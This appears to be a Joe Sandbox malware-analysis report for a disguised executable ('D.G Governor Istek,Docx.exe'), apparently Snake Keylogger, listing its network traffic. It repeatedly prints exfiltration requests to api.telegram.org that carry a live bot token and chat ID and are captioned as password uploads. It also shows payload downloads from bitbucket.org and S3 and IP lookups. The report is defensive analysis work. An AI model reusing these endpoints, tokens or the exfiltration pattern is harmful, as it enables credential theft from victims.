          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd21a9f558bff4Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd21acbc242eedHost: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2321d33b2b75Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd21d05113ef78Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd21cf699ce188Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd23627ca5d7a5Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd21f3fd82474bHost: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd221a131b77faHost: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd23a7e0c358b1Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd21f715d5f928Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2228c5d66eadHost: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd224dea6ac3fcHost: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2410d566cb44Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2253ee1debebHost: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd227b407d5dfdHost: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2470cc4c7c4cHost: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd228686aed571Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd22ac30a66dbfHost: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd24f09b604f03Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd22c3003a5e58Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd22efb27445d5Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2587cc98b653Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd22ff41348b47Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd232b76f6085eHost: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd26047d4600f9Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2347cf9f5e67Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd236fb4dcf471Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd268de6126dd3Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2391582c4776Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd23b767e4612bHost: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd271102821989Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd23ee6cc60601Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd241d958a93e9Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2799595f15e7Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2461846d9172Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2480fc2e3ffdHost: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2813e0605d29Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd24f1d8f190eaHost: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd25151bda7f10Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd28b07a2e3bf6Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2541c39c92aaHost: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2570877d30d9Host: api.telegram.orgContent-Length: 535Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2941500303d9Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd25d7579be125Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd26086a764c20Host: api.telegram.orgContent-Length: 535
          Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
          Source: Joe Sandbox ViewIP Address: 185.166.143.49 185.166.143.49
          Source: Joe Sandbox ViewIP Address: 132.226.247.73 132.226.247.73
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
          Source: unknownDNS query: name: checkip.dyndns.org
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49716 -> 52.217.32.148:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49715 -> 185.166.143.49:443
          Source: global trafficHTTP traffic detected: GET /ntim1478/gpmaw/downloads/202_Cneehezxuzj HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: bitbucket.org
          Source: global trafficHTTP traffic detected: GET /e427e629-62a6-4ecd-bf22-56e4d6ea083f/downloads/3fdf6255-c09f-4309-a330-311e812ab273/202_Cneehezxuzj?response-content-disposition=attachment%3B%20filename%3D%22202_Cneehezxuzj%22&AWSAccessKeyId=ASIA6KOSE3BNEALCMKKZ&Signature=5HNNyrRhI17TtxEvBhRXBlIjzcE%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEJj%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIHzBvFwyiabwJo1RlEoXCuvYHlAj6GVUZcZJKMBSK6ENAiEA3lwDPyl2LnkI6qpuGfjEQS9N8qqF9JEL2NUziGWNIn8qpwIIYBAAGgw5ODQ1MjUxMDExNDYiDDj%2BrSjdv5z1DIwKsiqEApJ6u4jhBQd6j%2F999%2FKkXtAvgpY37KiSNSwzYxBC8wGz1X3uO0OlC3WWJ5HAblmMn89zpI6f9%2BRlrc7sEdixhZASuJjFVAm0rJDVe%2BcMUyRk%2FduiqyuXya%2BU7xCgRBhsKNelgYsfCR%2FexdjG4q1vGkc8XCMvlYKeYOdtMKIRlFzLXsXEh8MrIP8O90zcOf2tzV0xktzXWNPU1azrGxRsSRJXq35xOUz0%2FJR%2FQfN0mW9QaJrOxnrli3WFJajfSk9OFZwIhVZ8aqEv%2FHqW4txt8CUPEz8sZ1QR29gsSzQcgvThmwSrYgPJSR2%2BdgVltAF%2F17Esh33PZq4j1bIpUHdeXcONqWL9MJ3Ji7sGOp0BjViqRpDV2XSIOnqCOIjo564QwrPkJGWVJI%2B7Qg%2BAmAfIYrTa4QwMXzoydc9fWDEBwHeXx4VGraN4rvN9o4uGCAK98mQ8Io30CJ2mll5bGrmu1Y%2B9SoBV38pLHiwvgAzvv3NdmAsCcGRS%2Fvc9QAw7npYb9JKojViWZN33%2FPyasPn%2FGYHRVXxtJTebEdkz7iFZfvYPbjkmr4Agj%2FIHWA%3D%3D&Expires=1734536101 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: bbuseruploads.s3.amazonaws.com
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /ntim1478/gpmaw/downloads/202_Cneehezxuzj HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: bitbucket.org
          Source: global trafficHTTP traffic detected: GET /e427e629-62a6-4ecd-bf22-56e4d6ea083f/downloads/3fdf6255-c09f-4309-a330-311e812ab273/202_Cneehezxuzj?response-content-disposition=attachment%3B%20filename%3D%22202_Cneehezxuzj%22&AWSAccessKeyId=ASIA6KOSE3BNEALCMKKZ&Signature=5HNNyrRhI17TtxEvBhRXBlIjzcE%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEJj%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIHzBvFwyiabwJo1RlEoXCuvYHlAj6GVUZcZJKMBSK6ENAiEA3lwDPyl2LnkI6qpuGfjEQS9N8qqF9JEL2NUziGWNIn8qpwIIYBAAGgw5ODQ1MjUxMDExNDYiDDj%2BrSjdv5z1DIwKsiqEApJ6u4jhBQd6j%2F999%2FKkXtAvgpY37KiSNSwzYxBC8wGz1X3uO0OlC3WWJ5HAblmMn89zpI6f9%2BRlrc7sEdixhZASuJjFVAm0rJDVe%2BcMUyRk%2FduiqyuXya%2BU7xCgRBhsKNelgYsfCR%2FexdjG4q1vGkc8XCMvlYKeYOdtMKIRlFzLXsXEh8MrIP8O90zcOf2tzV0xktzXWNPU1azrGxRsSRJXq35xOUz0%2FJR%2FQfN0mW9QaJrOxnrli3WFJajfSk9OFZwIhVZ8aqEv%2FHqW4txt8CUPEz8sZ1QR29gsSzQcgvThmwSrYgPJSR2%2BdgVltAF%2F17Esh33PZq4j1bIpUHdeXcONqWL9MJ3Ji7sGOp0BjViqRpDV2XSIOnqCOIjo564QwrPkJGWVJI%2B7Qg%2BAmAfIYrTa4QwMXzoydc9fWDEBwHeXx4VGraN4rvN9o4uGCAK98mQ8Io30CJ2mll5bGrmu1Y%2B9SoBV38pLHiwvgAzvv3NdmAsCcGRS%2Fvc9QAw7npYb9JKojViWZN33%2FPyasPn%2FGYHRVXxtJTebEdkz7iFZfvYPbjkmr4Agj%2FIHWA%3D%3D&Expires=1734536101 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: bbuseruploads.s3.amazonaws.com
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficDNS traffic detected: DNS query: bitbucket.org
          Source: global trafficDNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
          Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
          Source: global trafficDNS traffic detected: DNS query: api.telegram.org
          Source: unknownHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd1f4d1c06ddc3Host: api.telegram.orgContent-Length: 535Connection: Keep-Alive
          Source: xzeheenC.pif, 00000004.00000002.3468357631.000000001D42D000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000004.00000002.3468357631.000000001D423000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000004.00000002.3468357631.000000001D393000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000004.00000002.3468357631.000000001D56A000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000004.00000002.3468357631.000000001D547000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000004.00000002.3468357631.000000001D65F000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000004.00000002.3468357631.000000001D3F5000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000009.00000002.3471546461.0000000034797000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000009.00000002.3471546461.0000000034639000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000009.00000002.3471546461.000000003475D000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000000D.00000002.3468608975.0000000030FC5000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000000D.00000002.3468608975.0000000030E57000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000000D.00000002.3468608975.0000000030F7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
          Source: D.G Governor Istek,Docx.exe, 00000000.00000002.2274262219.0000000020800000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2277099019.0000000021778000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000003.2226424806.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2277821297.000000002190E000.00000004.00000020.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2279806088.000000007F450000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000002.2383062167.0000000021300000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000002.2375761543.0000000020833000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
          Source: D.G Governor Istek,Docx.exe, 00000000.00000002.2274262219.0000000020800000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2277099019.0000000021778000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000003.2226424806.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2277821297.000000002190E000.00000004.00000020.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2279806088.000000007F450000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000002.2383062167.0000000021300000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000002.2375761543.0000000020833000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
